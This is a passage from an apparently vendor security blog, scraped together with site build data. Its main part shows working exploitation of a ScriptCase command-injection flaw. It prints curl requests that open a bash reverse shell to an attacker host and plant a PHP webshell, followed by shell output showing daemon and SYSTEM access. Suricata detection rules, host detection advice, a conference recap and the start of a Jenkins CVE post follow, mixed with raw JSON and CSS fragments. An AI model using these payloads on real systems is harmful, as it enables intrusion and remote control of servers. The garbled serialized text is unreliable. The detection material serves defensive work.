 $str_command = $str_unset_ld_library.$this->getSSHCommand($arr_ssh);
 if($this->bol_sc_debug)
 {
     $time_start = $this->microtime_float();
      $this->sc_start_debug("Connect SSH", $str_command, $time_start);
 }

 exec($str_command);
```

As you can see, there are multiple parameters we can inject commands into. For simplicity, I've selected `ssh_server` below:

```bash
curl -v 'http://10.9.49.69:8092/scriptcase/prod/lib/php/devel/iface/admin_sys_allconections_test.php' \
 -H 'Accept-Language: en-US' \
 -H 'Cookie: PHPSESSID=fixated' \
 --data-urlencode 'dbms=sqlite' \
 --data-urlencode 'conn=conn_sqlite' \
 --data-urlencode 'dbms=pdosqlite' \
 --data-urlencode 'use_ssh=Y' \
 --data-urlencode 'ssh_server=f; bash -c "bash &> /dev/tcp/10.9.49.196/1270 <&1;"'
```

When that request lands, our listener immediately catches a reverse shell from the target:

```console
albinolobster@mournland:~$ nc -lvnp 1270
Listening on 0.0.0.0 1270
Connection received on 10.9.49.69 39470
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
ps --forest --format user,pid,cmd
USER      PID CMD
daemon  24073 /opt/Scriptcase/v9-php81/components/apache/bin/fcgi-pm     -k start -d /opt/Scriptcase/v9-php81/components/apache/bin/..
daemon  24077  \_ /opt/Scriptcase/v9-php81/components/php/bin/php-cgi
daemon  24080  |   \_ /opt/Scriptcase/v9-php81/components/php/bin/php-cgi
daemon  24081  |   \_ /opt/Scriptcase/v9-php81/components/php/bin/php-cgi
daemon  24217  \_ /opt/Scriptcase/v9-php81/components/php/bin/php-cgi
daemon  24218  |   \_ /opt/Scriptcase/v9-php81/components/php/bin/php-cgi
daemon  24219  |   \_ /opt/Scriptcase/v9-php81/components/php/bin/php-cgi
daemon  24226  \_ /opt/Scriptcase/v9-php81/components/php/bin/php-cgi
daemon  24227  |   \_ /opt/Scriptcase/v9-php81/components/php/bin/php-cgi
daemon  24228  |   \_ /opt/Scriptcase/v9-php81/components/php/bin/php-cgi
daemon  32998  |    \_ sh -c -- unset LD_LIBRARY_PATH && ssh -o UserKnownHostsFile=/tmp/known_hosts -o StrictHostKeyChecking=no -fNg -L :: @f; bash -c "bash &> /dev/tcp/10.9.49.185/1270 <&1;" sleep 60  > /dev/null
daemon  33000  |        \_ bash -c bash &> /dev/tcp/10.9.49.185/1270 <&1; sleep 60
daemon  33001  |            \_ bash
daemon  33019  |                \_ ps --forest --format user,pid,cmd
```
That works fine for Linux installs, but many ScriptCase deployments run on Windows, where a bash reverse shell won't help. In that case we can drop a minimal PHP webshell instead. Note the `^` characters: `cmd.exe` uses `^` to escape `<` and `>`, so they survive to the `echo` rather than being treated as redirections.

```console
curl -v 'http://10.9.49.52:8092/scriptcase/prod/lib/php/devel/iface/admin_sys_allconections_test.php' \
    -H 'Accept-Language: en-US' \
    -H 'Cookie: PHPSESSID=fixated' \
    --data-urlencode 'dbms=sqlite' \
    --data-urlencode 'conn=conn_sqlite' \
    --data-urlencode 'dbms=pdosqlite' \
    --data-urlencode 'use_ssh=Y' \
    --data-urlencode 'ssh_server=f & echo ^<?php system($_GET["cmd"]); ?^> > hi.php &'
```

The relative path `hi.php` lands in the ScriptCase `iface` directory, which is served directly. With that in place, we can execute arbitrary commands without authentication:

```console
albinolobster@mournland:~$ curl -kv http://10.9.49.52:8092/scriptcase/prod/lib/php/devel/iface/hi.php?cmd=whoami
*   Trying 10.9.49.52:8092...
* TCP_NODELAY set
* Connected to 10.9.49.52 (10.9.49.52) port 8092 (#0)
> GET /scriptcase/prod/lib/php/devel/iface/hi.php?cmd=whoami HTTP/1.1
> Host: 10.9.49.52:8092
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Tue, 12 Aug 2025 18:17:47 GMT
< Server: Apache/2.4.62 (Win64) mod_fcgid/2.3.10-dev
< X-Powered-By: PHP/8.1.31
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
nt authority\system
 
* Connection #0 to host 10.9.49.52 left intact
```

Note the `nt authority\system` in the response. The Windows install runs the web server as SYSTEM, so the webshell inherits full SYSTEM privileges, whereas the Linux install above ran as the unprivileged `daemon` user.
charset=UTF-8\n",[1373,35659,35660],{"class":1375,"line":4877},[1373,35661,35662],{"class":9383},"\u003C\n",[1373,35664,35665],{"class":1375,"line":4915},[1373,35666,35667],{"class":9383},"nt authority\\system\n",[1373,35669,35670],{"class":1375,"line":4931},[1373,35671,19298],{"class":9383},[1373,35673,35674],{"class":1375,"line":4947},[1373,35675,35676],{"class":9383},"* Connection #0 to host 10.9.49.52 left intact\n",[18,35678,35679],{},"With a webshell or reverse shell in place, the exploitation chain is complete, but that’s only half the story. For defenders, the question becomes: how do you spot this activity before or after it happens?",[1920,35681,1710],{"id":1709},[18,35683,35684],{},"The VulnCheck Initial Access team arms our customers with more than just exploits. We deliver detections like version scanners, Suricata\u002FSnort rules, Sigma rules, and more. The version scanner is often the most important starting point. Defenders should check whether their ScriptCase deployment is vulnerable. 
By default, the landing page exposes a version string in its HTML, which can be compared directly against patched releases.",[18,35686,35687],{},[68,35688],{":width":10862,"alt":35689,"src":35690},"Version on ScriptCase devel landing page","\u002Fblog\u002Fscriptcase-rce\u002Fscriptcase-version.png",[18,35692,35693,35694,35701],{},"The VulnCheck Initial Access team built a passive version scanner (see our writeup, ",[1131,35695,35696],{},[47,35697,35700],{"href":35698,"rel":35699},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fvulncheck-goes-scanless",[51],"VulnCheck Goes Scanless",") to run across Shodan data, and 57% of observed instances still reported a vulnerable version.",[1925,35703,35704],{},[18,35705,35706],{},"Internet-facing SiteScript Vulnerability Status",[11128,35708],{":labels":35709,":values":35710},"[\"Vulnerable\",\"Patched\",\"Unknown\"]","[235,125,55]",[18,35712,35713],{},"On the network side, the two key exploitation steps, the unauthenticated password reset and the authenticated command injection, leave distinct HTTP paths and parameters that are easy to match. 
We’ve developed Suricata signatures to detect both stages, so defenders can spot exploitation attempts before they succeed.",[1354,35715,35717],{"className":34366,"code":35716,"language":34368,"meta":219,"style":219},"alert http any any -> any any ( \\\n  msg:\"VULNCHECK NetMake ScriptCase CVE-2025-47227 Production Env Password Reset\"; \\\n  flow:established,to_server; \\\n  http.method; content:\"POST\"; \\\n  http.uri; content:\"\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Flogin.php\"; \\\n  http.request_body; content:\"nm_action=\"; \\\n  content:\"pass_new=\"; \\\n  content:\"pass_conf=\"; \\\n  content:\"email=\"; \\\n  content:\"captcha=\"; \\\n  reference:cve,CVE-2025-47227; \\\n  classtype:web-application-attack; \\\n  sid:12700625; rev:1; \\\n  metadata: deployment Datacenter, deployment SSLDecrypt;)\n\nalert http any any -> any any ( \\\n  msg:\"VULNCHECK NetMake ScriptCase CVE-2025-47228 Connection Command Injection\"; \\\n  flow:established,to_server; \\\n  http.method; content:\"POST\"; \\\n  http.uri; content:\"\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Fadmin_sys_allconections_test.php\"; \\\n  http.request_body; content:\"dbms\"; \\\n  content:\"dbms\"; distance: 0; \\\n  content:\"use_ssh=\"; \\\n  pcre:\"\u002Fuse_ssh=[y|%59|%79]\u002Fi\"; \\\n  pcre:\"\u002Fssh.*(\\;|%3a|>|%3e|%26|\\||%7c|\\\"|%22|\\$|%24|'|%27|`|%60)\u002Fi\"; \\\n  reference:cve,CVE-2025-47228; \\\n  classtype:web-application-attack; \\\n  sid:12700631; rev:1; \\\n  metadata: deployment Datacenter, deployment SSLDecrypt;)\n",[886,35718,35719,35724,35729,35734,35739,35744,35749,35754,35759,35764,35769,35774,35779,35784,35789,35793,35797,35802,35806,35810,35815,35820,35825,35830,35835,35840,35845,35849,35854],{"__ignoreMap":219},[1373,35720,35721],{"class":1375,"line":1376},[1373,35722,35723],{"class":9383},"alert http any any -> any any ( \\\n",[1373,35725,35726],{"class":1375,"line":220},[1373,35727,35728],{"class":9383},"  msg:\"VULNCHECK NetMake 
ScriptCase CVE-2025-47227 Production Env Password Reset\"; \\\n",[1373,35730,35731],{"class":1375,"line":1266},[1373,35732,35733],{"class":9383},"  flow:established,to_server; \\\n",[1373,35735,35736],{"class":1375,"line":1852},[1373,35737,35738],{"class":9383},"  http.method; content:\"POST\"; \\\n",[1373,35740,35741],{"class":1375,"line":4692},[1373,35742,35743],{"class":9383},"  http.uri; content:\"\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Flogin.php\"; \\\n",[1373,35745,35746],{"class":1375,"line":4724},[1373,35747,35748],{"class":9383},"  http.request_body; content:\"nm_action=\"; \\\n",[1373,35750,35751],{"class":1375,"line":4756},[1373,35752,35753],{"class":9383},"  content:\"pass_new=\"; \\\n",[1373,35755,35756],{"class":1375,"line":4768},[1373,35757,35758],{"class":9383},"  content:\"pass_conf=\"; \\\n",[1373,35760,35761],{"class":1375,"line":4792},[1373,35762,35763],{"class":9383},"  content:\"email=\"; \\\n",[1373,35765,35766],{"class":1375,"line":4798},[1373,35767,35768],{"class":9383},"  content:\"captcha=\"; \\\n",[1373,35770,35771],{"class":1375,"line":4806},[1373,35772,35773],{"class":9383},"  reference:cve,CVE-2025-47227; \\\n",[1373,35775,35776],{"class":1375,"line":4817},[1373,35777,35778],{"class":9383},"  classtype:web-application-attack; \\\n",[1373,35780,35781],{"class":1375,"line":4825},[1373,35782,35783],{"class":9383},"  sid:12700625; rev:1; \\\n",[1373,35785,35786],{"class":1375,"line":4835},[1373,35787,35788],{"class":9383},"  metadata: deployment Datacenter, deployment SSLDecrypt;)\n",[1373,35790,35791],{"class":1375,"line":4843},[1373,35792,6520],{"emptyLinePlaceholder":237},[1373,35794,35795],{"class":1375,"line":4849},[1373,35796,35723],{"class":9383},[1373,35798,35799],{"class":1375,"line":4877},[1373,35800,35801],{"class":9383},"  msg:\"VULNCHECK NetMake ScriptCase CVE-2025-47228 Connection Command Injection\"; 
\\\n",[1373,35803,35804],{"class":1375,"line":4915},[1373,35805,35733],{"class":9383},[1373,35807,35808],{"class":1375,"line":4931},[1373,35809,35738],{"class":9383},[1373,35811,35812],{"class":1375,"line":4947},[1373,35813,35814],{"class":9383},"  http.uri; content:\"\u002Fprod\u002Flib\u002Fphp\u002Fdevel\u002Fiface\u002Fadmin_sys_allconections_test.php\"; \\\n",[1373,35816,35817],{"class":1375,"line":4952},[1373,35818,35819],{"class":9383},"  http.request_body; content:\"dbms\"; \\\n",[1373,35821,35822],{"class":1375,"line":6776},[1373,35823,35824],{"class":9383},"  content:\"dbms\"; distance: 0; \\\n",[1373,35826,35827],{"class":1375,"line":6781},[1373,35828,35829],{"class":9383},"  content:\"use_ssh=\"; \\\n",[1373,35831,35832],{"class":1375,"line":7524},[1373,35833,35834],{"class":9383},"  pcre:\"\u002Fuse_ssh=[y|%59|%79]\u002Fi\"; \\\n",[1373,35836,35837],{"class":1375,"line":7530},[1373,35838,35839],{"class":9383},"  pcre:\"\u002Fssh.*(\\;|%3a|>|%3e|%26|\\||%7c|\\\"|%22|\\$|%24|'|%27|`|%60)\u002Fi\"; \\\n",[1373,35841,35842],{"class":1375,"line":7546},[1373,35843,35844],{"class":9383},"  reference:cve,CVE-2025-47228; \\\n",[1373,35846,35847],{"class":1375,"line":7571},[1373,35848,35778],{"class":9383},[1373,35850,35851],{"class":1375,"line":7598},[1373,35852,35853],{"class":9383},"  sid:12700631; rev:1; \\\n",[1373,35855,35856],{"class":1375,"line":7615},[1373,35857,35788],{"class":9383},[18,35859,35860,35861,35864,35865,35867],{},"On the host itself, exploitation on Windows creates a clear process chain: ",[886,35862,35863],{},"php-cgi.exe -> cmd.exe"," with a command line containing the injected payload. 
In the example below, Procmon captures ",[886,35866,14509],{}," launching as a direct result of the OS command injection.",[18,35869,35870],{},[68,35871],{":width":10862,"alt":35872,"src":35873},"ScriptCase exploitation as seen by procmon","\u002Fblog\u002Fscriptcase-rce\u002Fprocmon-view.png",[18,35875,35876],{},"In cases where the attacker drops a webshell instead of running commands directly, defenders should watch for unexpected files in:",[1354,35878,35881],{"className":35879,"code":35880,"language":1359},[1357],"\u003Cscriptface-webpath>\\scriptcase\\prod\\lib\\devel\\iface\\\n",[886,35882,35880],{"__ignoreMap":219},[18,35884,35885,35886,1554,35889,35891],{},"This is the default drop location, but since exploitation lets the attacker choose the path, shells can be written anywhere the web server process has write access. Any new or modified PHP file in the ScriptCase webroot should be treated as suspicious, especially if it contains one-line  ",[886,35887,35888],{},"system()",[886,35890,1909],{}," calls.",[1920,35893,1903],{"id":1902},[18,35895,35896,35897,35899],{},"Whether you’re hunting, exploiting, or defending, the playbook is straightforward: know how to find vulnerable targets, understand how the exploit chain works, and have clear detection and response strategies in place. The attackers looking for ",[886,35898,34333],{}," aren’t waiting for you to patch, and the sooner you close these holes, the less likely you are to see your own server in someone else’s shell prompt.",[1920,35901,202],{"id":201},[18,35903,35904,35905,1246,35911,1246,35918,1255,35925,59],{},"The VulnCheck Initial Access team is always searching for new systems to pop shells on. 
For more research like this, see our blogs ",[47,35906,35908],{"href":32015,"rel":35907},[51],[1131,35909,35910],{},"Command Injection in Jenkins via Git Parameter",[47,35912,35915],{"href":35913,"rel":35914},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fhikvision-mount-shell",[51],[1131,35916,35917],{},"Novel Use of \"mount\" Spotted in Hikvision Attacks",[47,35919,35922],{"href":35920,"rel":35921},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Flinuxsys-cryptominer",[51],[1131,35923,35924],{},"The Linuxsys Coinmine",[47,35926,35929],{"href":35927,"rel":35928},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fjuniper-cve-2023-36845",[51],[1131,35930,35931],{},"Fileless Remote Code Execution on Juniper Firewalls",[18,35933,33941,35934,33945,35937,1240,35940,1246,35943,1255,35946,1260],{},[47,35935,1233],{"href":10806,"rel":35936},[51],[47,35938,1239],{"href":1237,"rel":35939},[51],[47,35941,1245],{"href":1243,"rel":35942},[51],[47,35944,1251],{"href":1249,"rel":35945},[51],[47,35947,216],{"href":1258,"rel":35948},[51],[1920,35950,2850],{"id":2849},[2901,35952,35953],{},"html pre.shiki code .s91G_, html code.shiki .s91G_{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#F8F8F2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: 
var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .siCPE, html code.shiki 
.siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sSBr1, html code.shiki .sSBr1{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sQqfL, html code.shiki .sQqfL{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#F8F8F2}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}",{"title":219,"searchDepth":220,"depth":220,"links":35955},[],"2025-08-14","A month after disclosure, hundreds of ScriptCase servers remain exposed and actively targeted. 
This post walks through finding vulnerable instances, exploiting them with just a few curl commands, and the key detection points defenders can use to stop attacks.",{"slug":35959},"scriptcase-rce","\u002Fblog\u002Fscriptcase-rce",{"title":34222,"description":35957},"blog\u002Fscriptcase-rce",[242,35964,23275,1281],"detections","aJtD_sAKP5T5P47doeGxheL9po_M-Ma1j2Azvnu8fIg",{"id":35967,"title":35968,"articles":35969,"authors":35970,"body":35972,"date":36173,"description":36174,"extension":234,"image":7,"link":7,"meta":36175,"navigation":237,"path":36176,"seo":36177,"series":7,"stem":36178,"subtype":7,"tags":36179,"__hash__":36180},"blog\u002Fblog\u002Fblackhat-2025-review.md","Dispatch from the Desert: VulnCheck at BlackHat, Security Wasteland, and DEFCON",[],[35971],{"name":3256,"avatar":3257,"link":3258,"linkName":3259},{"type":15,"value":35973,"toc":36164},[35974,35980,35987,35990,35996,36011,36019,36022,36028,36031,36037,36044,36056,36059,36065,36071,36074,36098,36101,36107,36110,36113,36116,36122,36125,36144,36150,36153,36155,36157],[18,35975,35976],{},[68,35977],{"alt":35978,"src":35979},"Defcon 33 Human Badge","\u002Fblog\u002Fblackhat-2025-review\u002Fdefcon-badge.png",[18,35981,35982,35983,35986],{},"This year marked my ",[295,35984,35985],{},"10th anniversary"," of parking myself in Vegas for a week of hacker summer camp, running into friends and “hacker family,” soaking up the latest research, and getting the update from colleagues on what they are building.",[18,35988,35989],{},"From a VulnCheck perspective, here’s what stood out over the week and a few predictions about where we’re headed as an industry in the latter half of 2025.",[61,35991,35993],{"id":35992},"security-wasteland",[295,35994,35995],{},"Security Wasteland",[18,35997,35998,35999,36001,36002,36007,36008,36010],{},"Year two of our off-strip event, ",[295,36000,35995],{},", was equal parts playground and laid-back lounge, hosted at the 
",[47,36003,36006],{"href":36004,"rel":36005},"https:\u002F\u002Fwww.kmaeventcenterlasvegas.com\u002F",[51],"Keep Memory Alive Event Center"," -- a Frank Gehry fever dream of a building. We wanted a space that could fuel the party energy ",[1131,36009,297],{}," spark meaningful connections.",[22,36012,36013,36016],{},[25,36014,36015],{},"Hidden conversation nooks, rock music, and a chance to re-experience vinyl (Purple Rain, Led Zeppelin, Nirvana albums as swag).",[25,36017,36018],{},"Conversations about real exploitation data, swapping TTPs over drinks, and sharing stories you won’t find in any vendor deck.",[18,36020,36021],{},"We even had a custom latte art printer, which included a camera to put your face on the latte? Wild.",[18,36023,36024],{},[68,36025],{"alt":36026,"src":36027},"They put my face on a latte!","\u002Fblog\u002Fblackhat-2025-review\u002Fsecuritywastelandlatte.jpg",[18,36029,36030],{},"No badge scans, no awkward elevator pitches... just hackers, researchers, and defenders trading ideas. Judging by the late-night conversations, we nailed our goal.",[61,36032,36034],{"id":36033},"on-the-black-hat-floor",[295,36035,36036],{},"On the Black Hat Floor",[18,36038,36039,36040,36043],{},"Our booth was where ",[295,36041,36042],{},"real-world exploitation intel"," met the chaos of the business hall.\nEven though this year felt lighter on foot traffic, it worked in our favor, providing more time for long, honest conversations about the problems people are facing and the kind of intel they actually need. 
Special shoutout to the healthcare IT pro who gave me a deep dive into his toolset and threat model.",[22,36045,36046,36049],{},[25,36047,36048],{},"Live walk-throughs of active exploitation evidence.",[25,36050,36051,36052,36055],{},"Deep chats with red-teamers, threat intel analysts, and vulnerability managers about what ",[1131,36053,36054],{},"really"," matters in vuln prioritization.",[18,36057,36058],{},"We didn’t just hand out swag (though, yes, the tactical bracelets and water bottles disappeared fast), we traded knowledge. We even got to see the NOC's network threat hunt map in action.",[18,36060,36061],{},[68,36062],{"alt":36063,"src":36064},"Network Threat Hunt Map from the BlackHat NOC","\u002Fblog\u002Fblackhat-2025-review\u002Fblackhatnoc.jpg",[993,36066,36068],{"id":36067},"ai-in-the-wild",[295,36069,36070],{},"AI in the Wild",[18,36072,36073],{},"The AI booths this year were impossible to miss, but between the hype cycles were some solid working prototypes:",[22,36075,36076,36082,36091],{},[25,36077,36078,36081],{},[295,36079,36080],{},"AI SOCs"," - live demos of AI-assisted SOCs handling triage, threat hunting, and automated incident playbooks. Makes tons of sense to me as a former SOC manager as many events in an environment are repeatable patterns that once your analysts understand, should be automated out of the ecosystem.",[25,36083,36084,36087,36088,36090],{},[295,36085,36086],{},"AI Pentesting"," - chaining LLMs with exploit frameworks to map, probe, and even ",[1131,36089,22852],{}," targets with minimal human input. 
Exciting and terrifying in equal measure due to the way this could increase speed of exploitation across the board.",[25,36092,36093,36094,36097],{},"Purpose-built players like ",[295,36095,36096],{},"XBOW",", who I didn't realize was a whole entire company instead of just an AI hacking bot, showing how specialization lets you uncover huge vulnerability volumes in record time.",[18,36099,36100],{},"The takeaway from my perspective? AI in cybersecurity is making the move to displace the jobs that rely on repeatable, pattern-based circumstances -- pentesting first passes, phishing responses, and report writing.",[61,36102,36104],{"id":36103},"rolling-into-defcon",[295,36105,36106],{},"Rolling into DEFCON",[18,36108,36109],{},"When Black Hat shut down, a few of us stayed maybe a little too long, but not without the utmost excitement for what we encountered.",[18,36111,36112],{},"We made the rounds at the Defcon Villages including Aviation, Space, Hardware Hacking, ICS, and Blue Team Village, where defenders shared in depth detections, playbooks, and stories from the trenches. Some of the best takeaways came from hallway conversations, where the skillsets range from seasoned pro to right out of coding bootcamp.",[18,36114,36115],{},"The highlight here for me? The talks with the juniors in our industry who look at emerging threats in an entirely different way because they're not battle hardened like the rest of us. The talks with every person who tore apart a random piece of equipment they purchased off eBay to understand deeper how it works and then manipulate its abilities.",[1920,36117,36119],{"id":36118},"what-we-took-home",[295,36120,36121],{},"What We Took Home",[18,36123,36124],{},"Events like this keep us honest. 
They remind us why we do this work:",[22,36126,36127,36134,36137],{},[25,36128,36129,36130,36133],{},"To stay involved in the community that spots trends ",[1131,36131,36132],{},"before"," they hit the news.",[25,36135,36136],{},"To test our ideas against the toughest critics: the hackers themselves.",[25,36138,36139,36140,36143],{},"To keep VulnCheck rooted in ",[295,36141,36142],{},"hacker-informed exploit intelligence"," defenders can act on immediately.",[18,36145,36146,36147,36149],{},"To everyone who came to ",[295,36148,35995],{},", stopped by our booth, or swapped stories over vendor party canapés or drinks... thank you. Let’s keep the conversations going.",[18,36151,36152],{},"See you next year, Vegas!",[1308,36154],{},[993,36156,202],{"id":201},[18,36158,36159,36160,59],{},"Interested to talk with us out in the wild? Catch us at our ",[47,36161,36163],{"href":36162},"\u002Fevents","upcoming events",{"title":219,"searchDepth":220,"depth":220,"links":36165},[36166,36167,36170],{"id":35992,"depth":220,"text":35995},{"id":36033,"depth":220,"text":36036,"children":36168},[36169],{"id":36067,"depth":1266,"text":36070},{"id":36103,"depth":220,"text":36106,"children":36171},[36172],{"id":201,"depth":1266,"text":202},"2025-08-12","Recapping our 2025 BlackHat and Defcon experience.",{},"\u002Fblog\u002Fblackhat-2025-review",{"title":35968,"description":36174},"blog\u002Fblackhat-2025-review",[],"s861abzmqrPADFiaSaonIrlrSFHkPj51tD0ykn1GSpY",{"id":36182,"title":32017,"articles":36183,"authors":36200,"body":36202,"date":36729,"description":36730,"extension":234,"image":7,"link":7,"meta":36731,"navigation":237,"path":36733,"seo":36734,"series":7,"stem":36735,"subtype":7,"tags":36736,"__hash__":36737},"blog\u002Fblog\u002Fgit-parameter-rce.md",[36184,36188,36192,36196],{"title":36185,"source":12145,"link":36186,"date":36187},"15,000 Jenkins Servers at Risk from RCE Vulnerability 
(CVE-2025-53652)","https:\u002F\u002Fhackread.com\u002Fjenkins-servers-risk-rce-vulnerability-cve-2025-53652\u002F","2025-08-08",{"title":36189,"source":12153,"link":36190,"date":36191},"Critical command injection flaw in Jenkins Git Parameter plugin revealed","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fcybersecurity-alert-critical-command-injection-flaw-in-jenkins-git-parameter-plugin","2025-08-11",{"title":36193,"source":36194,"link":36195,"date":36173},"15,00 Jenkins Servers With Vulnerable Git Parameter Plugin Enables Command Injection","CyberSecurtyNews","https:\u002F\u002Fcybersecuritynews.com\u002F1500-jenkins-servers-with-vulnerable-git-parameter-plugin\u002F#google_vignette",{"title":36197,"source":3495,"link":36198,"date":36199},"Risky Bulletin: MadeYouReset vulnerability enables unlimited HTTP\u002F2 DDoS attacks","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-madeyoureset-vulnerability-enables-unlimited-http-2-ddos-attacks\u002F","2025-08-15",[36201],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":36203,"toc":36726},[36204,36207,36209,36228,36235,36239,36246,36252,36258,36264,36274,36280,36289,36295,36309,36339,36348,36373,36376,36391,36400,36442,36452,36456,36463,36471,36477,36492,36498,36501,36516,36519,36523,36526,36531,36538,36549,36552,36558,36565,36605,36608,36610,36613,36616,36618,36643,36660,36662,36666,36723],[263,36205],{":list":36206,"ico":266,"title":20},"[\"CVE-2025-53652 was disclosed as medium severity, but it enables command injection via the Jenkins Git Parameter plugin.\",\"Around 15,000 Jenkins servers appear to allow unauthenticated access, making RCE viable in the wild.\",\"The patch can be disabled, so detection remains important even after upgrading.\"]",[1920,36208,11648],{"id":11647},[18,36210,36211,36212,36217,36218,36221,36222,36227],{},"On July 9, Jenkins disclosed 
",[47,36213,36216],{"href":36214,"rel":36215},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-53652",[51],"CVE-2025-53652"," (aka SECURITY-3419",[47,36219,467],{"href":36220},"#user-content-fn-1","), one of 31 plugin vulnerabilities announced that day. The vulnerability, affecting the ",[47,36223,36226],{"href":36224,"rel":36225},"https:\u002F\u002Fplugins.jenkins.io\u002Fgit-parameter\u002F",[51],"Git Parameter plugin",", was assigned a medium severity, and described as allowing attackers to \"inject arbitrary values in Git parameters\". That read to us as a parameter injection issue, something often dismissed as low-impact.",[18,36229,36230,36231,36234],{},"But this involved Git, and Git is not your average binary. It’s a well-known and versatile GTFObin",[47,36232,353],{"href":36233},"#user-content-fn-2",". We suspected that we could turn the parameter injection into remote code execution. Given the opportunity to do some GTFObin golfing, and with the plugin’s sizable install base, we decided to dig deeper.",[1920,36236,36238],{"id":36237},"unvalidated-git-parameters","Unvalidated Git Parameters",[18,36240,36241,36242,36245],{},"The issue is that the Git Parameter plugin accepts arbitrary values in parameter definitions, and those values are later used directly in shell commands. 
